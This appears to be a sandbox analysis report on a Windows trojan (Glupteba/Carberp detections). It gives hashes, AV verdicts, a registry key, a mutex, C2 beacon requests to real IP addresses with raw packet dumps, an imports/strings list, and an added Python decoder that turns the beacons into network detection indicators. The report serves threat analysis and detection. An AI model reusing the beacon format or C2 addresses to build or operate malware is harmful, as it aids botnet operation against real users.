Analysis Date: 2015-02-17 18:31:50
MD5: 112d65a0a3329e68de59585d76b91e6b
SHA1: a00e9eec3f490aefdb73c2437cb96d6e47537f32

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 72abc5e8ade1fc1493e6b136b7206eac  sha1: 29435c4604166f04209000fb1e8890fb9fa2a575  size: 94208
Section .rdata  md5: d6fce82920219166345f37ce868e5600  sha1: 544a21f71134a7cbc86303d2803669ae55b3134c  size: 20480
Section .data   md5: ec2e85fe82cb231678e73f91896f5807  sha1: 3e542970618e117f4b86a31c100aa706d61783a7  size: 8192
Section .rsrc   md5: ab5b1da4eb31ddd65d41de3c00442f68  sha1: d436f366b97d8cf7d5f52beda2d8baf70ae57cd4  size: 4096
Timestamp: 2015-02-02 13:06:27
Packer: Microsoft Visual C++ v6.0
PEhash: d065e4ec770d848b4e6a651f3d06cace7214130f
IMPhash: 57493fa51f506cad60b9af073c41347b
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.GenericKD.2152730
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): Trojan.GenericKD.2152730
AV Authentium: W32/Trojan.WOHH-7581
AV Avira (antivir): TR/Glupteba.sjsdf
AV BullGuard: Trojan.GenericKD.2152730
AV CA (E-Trust Ino): Win32/Carberp.DfWWIVB
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: Error Scanning File
AV Emsisoft: Trojan.GenericKD.2152730
AV Eset (nod32): Win32/Glupteba.M
AV Fortinet: W32/Glupteba.M!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Trojan.GenericKD.2152730
AV Grisoft (avg): Generic36.ATLX
AV Ikarus: Trojan.Win32.Glupteba
AV K7: Trojan ( 00286e241 )
AV Kaspersky: no_virus
AV MalwareBytes: Trojan.Agent
AV Mcafee: RDN/Generic.tfr!eh
AV Microsoft Security Essentials: Trojan:Win32/Carberp.I
AV MicroWorld (escan): Trojan.GenericKD.2152730
AV Rising: no_virus
AV Sophos: Error Scanning File
AV Symantec: Trojan.Gen
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝ 15150124\x00
Creates File: \Device\Afd\Endpoint
Creates Mutex: Global\MD7H82HHF7EH2D73

Network Details:

HTTP GET: http://63.251.156.211:24291/stat?uid=100&downlink=1111&uplink=1111&id=0001CC63&statpass=bpass&version=15150124&features=30&guid=330fe60c-40a1-4ae6-996d-5c60ee368360&comment=15150124&p=0&s=
User-Agent: (none sent; the request carries no headers at all, see Raw Pcap)
HTTP GET: http://223.202.33.211:11197/stat?uid=100&downlink=1111&uplink=1111&id=0001DFFB&statpass=bpass&version=15150124&features=30&guid=330fe60c-40a1-4ae6-996d-5c60ee368360&comment=15150124&p=0&s=
User-Agent: (none sent; the request carries no headers at all, see Raw Pcap)
Flows TCP: 192.168.1.1:1031 ➝ 95.131.139.225:26545
Flows TCP: 192.168.1.1:1031 ➝ 95.131.139.225:26545
Flows TCP: 192.168.1.1:1032 ➝ 63.251.156.211:24291
Flows TCP: 192.168.1.1:1033 ➝ 223.202.33.211:11197

Raw Pcap
0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303143 43363326 73746174 70617373   001CC63&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d333330 66653630   =30&guid=330fe60
0x00000070 (00112)   632d3430 61312d34 6165362d 39393664   c-40a1-4ae6-996d
0x00000080 (00128)   2d356336 30656533 36383336 3026636f   -5c60ee368360&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303144 46464226 73746174 70617373   001DFFB&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d333330 66653630   =30&guid=330fe60
0x00000070 (00112)   632d3430 61312d34 6165362d 39393664   c-40a1-4ae6-996d
0x00000080 (00128)   2d356336 30656533 36383336 3026636f   -5c60ee368360&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..
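The two hex dumps above are the complete payload of each beacon: a bare request line, `GET /stat?... HTTP/1.0`, followed directly by the blank line that ends the header block. There is no Host header and no User-Agent, and the `version` and `comment` parameters carry the same value the sample wrote to `HKCU\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value`. The `guid` is identical in both requests while `id` differs per C2 host. The Python below is an added example, not part of the sandbox output: it rebuilds each request from the hex column of the dumps (copied from this report), parses the query string, and reports those traits so they can be turned into network detection logic or cross-checked against the host indicators. The dump text and the registry value are from the report; the function names and indicator labels are this example's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The two "Raw Pcap" dumps from the report, copied as printed. Only the hex
# column is decoded; the ASCII column is a lossy rendering and is ignored.
DUMPS = [
    """\
0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303143 43363326 73746174 70617373   001CC63&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d333330 66653630   =30&guid=330fe60
0x00000070 (00112)   632d3430 61312d34 6165362d 39393664   c-40a1-4ae6-996d
0x00000080 (00128)   2d356336 30656533 36383336 3026636f   -5c60ee368360&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..
""",
    """\
0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303144 46464226 73746174 70617373   001DFFB&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d333330 66653630   =30&guid=330fe60
0x00000070 (00112)   632d3430 61312d34 6165362d 39393664   c-40a1-4ae6-996d
0x00000080 (00128)   2d356336 30656533 36383336 3026636f   -5c60ee368360&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..
""",
]

# Value the sample wrote to HKCU\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value
REGISTRY_VALUE = "15150124"

# Hex offset, decimal offset, then 1-4 hex groups separated by single spaces.
# The ASCII column follows after several spaces, so the groups never run into it.
DUMP_LINE = re.compile(
    r"^0x[0-9a-fA-F]{8}\s+\(\d+\)\s+((?:[0-9a-fA-F]{8} )*[0-9a-fA-F]{2,8})"
)


def decode_dump(dump: str) -> bytes:
    """Rebuild the raw TCP payload from a sandbox-style hex dump."""
    payload = bytearray()
    for line in dump.splitlines():
        m = DUMP_LINE.match(line)
        if m:
            payload += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(payload)


def parse_request(payload: bytes) -> dict:
    """Split a (possibly header-less) HTTP request into its parts.

    Returns method, path, protocol version, the lower-cased header names that
    were present, and the query as a name -> value dict (blank values such as
    the trailing 's=' are kept, so their presence can be asserted on).
    """
    head, _, _body = payload.partition(b"\r\n\r\n")
    lines = head.decode("ascii", errors="replace").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = [h.split(":", 1)[0].strip().lower() for h in lines[1:] if h]
    url = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    return {"method": method, "path": url.path, "version": version,
            "headers": headers, "query": query}


def beacon_indicators(req: dict) -> dict:
    """Traits of this beacon that a network detection can key on."""
    q = req["query"]
    return {
        "stat_path": req["path"] == "/stat",
        "http_1_0": req["version"] == "HTTP/1.0",
        "no_headers": not req["headers"],            # no Host, no User-Agent
        "static_statpass": q.get("statpass") == "bpass",
        "version_matches_registry": q.get("version") == REGISTRY_VALUE,
        "bot_id": q.get("id"),
        "guid": q.get("guid"),
    }


def analyse(dumps=DUMPS) -> list:
    """Decode every dump and return its indicator set, in report order."""
    return [beacon_indicators(parse_request(decode_dump(d))) for d in dumps]


if __name__ == "__main__":
    hosts = ["63.251.156.211:24291", "223.202.33.211:11197"]  # from the Flows lines
    for host, ind in zip(hosts, analyse()):
        print(host, ind)
```

The decoder trusts only the hex column because the ASCII column renders every non-printable byte as `.`, so the two `0d0a` line endings would be lost if it were used. For a network rule the combination of a `/stat?` path, `HTTP/1.0`, an empty header block, the constant `statpass=bpass` and a non-standard destination port is a far narrower match than any single parameter; the per-host `id` and the shared `guid` are the values worth carrying into host triage alongside the mutex and registry key above.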


Strings
.

9_!P
assisted
b5<\N
CompanyName
Discordia Limited
troubleshooting
VarFileInfo
VS_VERSION_INFO
W||_
wasteland
0-XXb(H
21%!?;7
22/1??
2{buji,T
2k?>F&r
(%->;3
3?q\kr
3xA}iBU
4^cvV8
6406  
:==>8<
]8p}dO
}?A${/
AbortSystemShutdownW
_acmdln
_adjust_fdiv
ADVAPI32.dll
B#_a*y
bI^pkrq
'bK&5k
BuildImpersonateExplicitAccessWithNameA
BuildSecurityDescriptorA
CE./^n
CheckRadioButton
ClearEventLogW
CLUSAPI.dll
ClusterRegCreateKey
COMCTL32.dll
_controlfp
ControlService
ConvertDefaultLocale
CopyBindInfo
c{qg`H
CreateAsyncBindCtxEx
CreateFileMappingA
CreateMenu
CreateMutexA
CreatePropertySheetPageW
CreateServiceA
Ct:aU)
d#&:;4
d7Mvxn4
@.data
DdeEnableCallback
DdeFreeStringHandle
DdeUnaccessData
DecryptFileA
DestroyCaret
DlgDirListComboBoxA
DragObject
dSNI]U
EnumCalendarInfoA
EnumDateFormatsA
EnumPropsExW
EnumServicesStatusW
EnumTimeFormatsA
_except_handler3
ExpandEnvironmentStringsW
  <!)F
fd#n\=
febsmihriokxslmrkm
FindFirstChangeNotificationA
FindFirstChangeNotificationW
FindMimeFromData
FlatSB_GetScrollPos
FormatMessageW
FreeLibrary
FreeSid
FtpRemoveDirectoryW
FtpRenameFileA
GetAclInformation
GetAsyncKeyState
GetClassInfoExA
GetClassURL
GetCommMask
GetConsoleCP
GetCurrencyFormatA
GetCurrentThread
GetDiskFreeSpaceExW
GetDlgItem
GetDlgItemTextA
GetEnvironmentStrings
GetEnvironmentVariableW
GetFileAttributesA
GetFileInformationByHandle
GetFileSecurityA
GetLengthSid
__getmainargs
GetMenuItemCount
GetMenuState
GetMenuStringA
GetModuleHandleA
GetMultipleTrusteeA
GetMultipleTrusteeOperationA
GetNamedPipeHandleStateW
GetNumberFormatW
GetNumberOfEventLogRecords
GetParent
GetPrivateProfileIntA
GetProfileIntW
GetServiceKeyNameA
GetShortPathNameA
GetSidLengthRequired
GetStartupInfoA
GetStartupInfoW
GetSystemDefaultLCID
GetSystemMenu
GetTapeParameters
GetWindowContextHelpId
G_;h_R
GlobalReAlloc
GlobalSize
HlinkGoBack
HlinkSimpleNavigateToMoniker
h#wz(Hke
ImageList_DragEnter
ImageList_DragMove
ImageList_GetBkColor
ImageList_GetIconSize
ImageList_SetBkColor
ImageList_Write
ImpersonateNamedPipeClient
IMPQueryIMEA
IMPSetIMEA
_initterm
InsertMenuItemA
InternetConfirmZoneCrossing
IsCharLowerW
IsIconic
IsValidSecurityDescriptor
IsWindow
 j%,;[[
JI%xXX
[j}(K4t(i
.J>R0%g
	J T	0
jx,>%E
kagwexlkpqoiwuukpla
KERNEL32.dll
LoadKeyboardLayoutW
LogonUserW
LookupPrivilegeValueA
LookupPrivilegeValueW
lo@r'd4
LsaFreeMemory
LsaQueryDomainInformationPolicy
LsaRetrievePrivateData
LsaSetTrustedDomainInfoByName
 M}[3|
MakeSelfRelativeSD
MapDialogRect
MapGenericMask
MPR.dll
Msi.dll
MSVCRT.dll
Mvp`X+
NDdeApi.dll
ObjectDeleteAuditAlarmA
ObjectDeleteAuditAlarmW
ObjectOpenAuditAlarmA
ObjectPrivilegeAuditAlarmA
OpenBackupEventLogW
OpenDesktopA
OpenEventLogA
OpenProcessToken
OpenThreadToken
OsUg6Wt
PaintDesktop
__p__commode
Pde\Cp
PdhComputeCounterStatistics
PdhConnectMachineW
pdh.dll
PdhEnumMachinesA
PdhGetDefaultPerfCounterW
PdhGetFormattedCounterArrayW
PdhGetFormattedCounterValue
PdhLookupPerfNameByIndexW
__p__fmode
PrivilegedServiceAuditAlarmA
p$r,U1
QueryServiceConfig2W
QueryServiceConfigW
QueryServiceLockStatusA
QueryServiceStatus
RASAPI32.dll
RasGetEntryDialParamsA
RasGetEntryPropertiesW
RasGetErrorStringW
RasGetProjectionInfoW
RasRenameEntryW
RasSetEntryDialParamsW
`.rdata
ReadEventLogW
RegConnectRegistryA
RegCreateKeyExW
RegEnumKeyA
RegisterBindStatusCallback
RegisterClassExA
RegisterEventSourceW
RegisterFormatEnumerator
RegOpenKeyA
RegOpenKeyExW
RegRestoreKeyA
RegRestoreKeyW
RegSaveKeyA
RegSetKeySecurity
RegUnLoadKeyA
RevertToSelf
RevokeFormatEnumerator
SendMessageCallbackA
SendNotifyMessageA
SetAclInformation
__set_app_type
SetCaretPos
SetClusterNetworkName
SetEntriesInAclW
SetFileSecurityW
SetPropW
SetSecurityDescriptorSacl
SetTimer
SetupAdjustDiskSpaceListW
SETUPAPI.dll
SetupCopyErrorA
SetupCopyErrorW
SetupDecompressOrCopyFileA
SetupDefaultQueueCallbackA
SetupDeleteErrorA
SetupDiBuildClassInfoListExW
SetupDiClassNameFromGuidA
SetupDiDeleteDeviceInterfaceRegKey
SetupDiGetClassDescriptionW
SetupDiGetClassDevsExW
SetupDiGetClassInstallParamsW
SetupDiGetDeviceInstanceIdA
SetupDiGetDeviceRegistryPropertyA
SetupDiGetHwProfileFriendlyNameW
SetupDiInstallDevice
SetupDiSetDriverInstallParamsW
SetupFreeSourceListA
SetupGetLineCountA
SetupGetStringFieldW
SetupInstallFileExA
SetupInstallFromInfSectionW
SetupLogFileA
SetupQuerySpaceRequiredOnDriveW
SetupQueueCopyA
SetupRemoveFromDiskSpaceListW
SetupRemoveInstallSectionFromDiskSpaceListA
SetupTermDefaultQueueCallback
__setusermatherr
SetWinEventHook
StartServiceCtrlDispatcherA
S?ut8X
!This program cannot be run in DOS mode.
Tm5W46N
URLDownloadToCacheFileA
urlmon.dll
URLOpenStreamA
USER32.dll
WININET.dll
WNetCancelConnectionW
WNetCloseEnum
WNetDisconnectDialog1W
WNetGetNetworkInformationW
_XcptFilter
xe1]Sc
xepkfbiyglq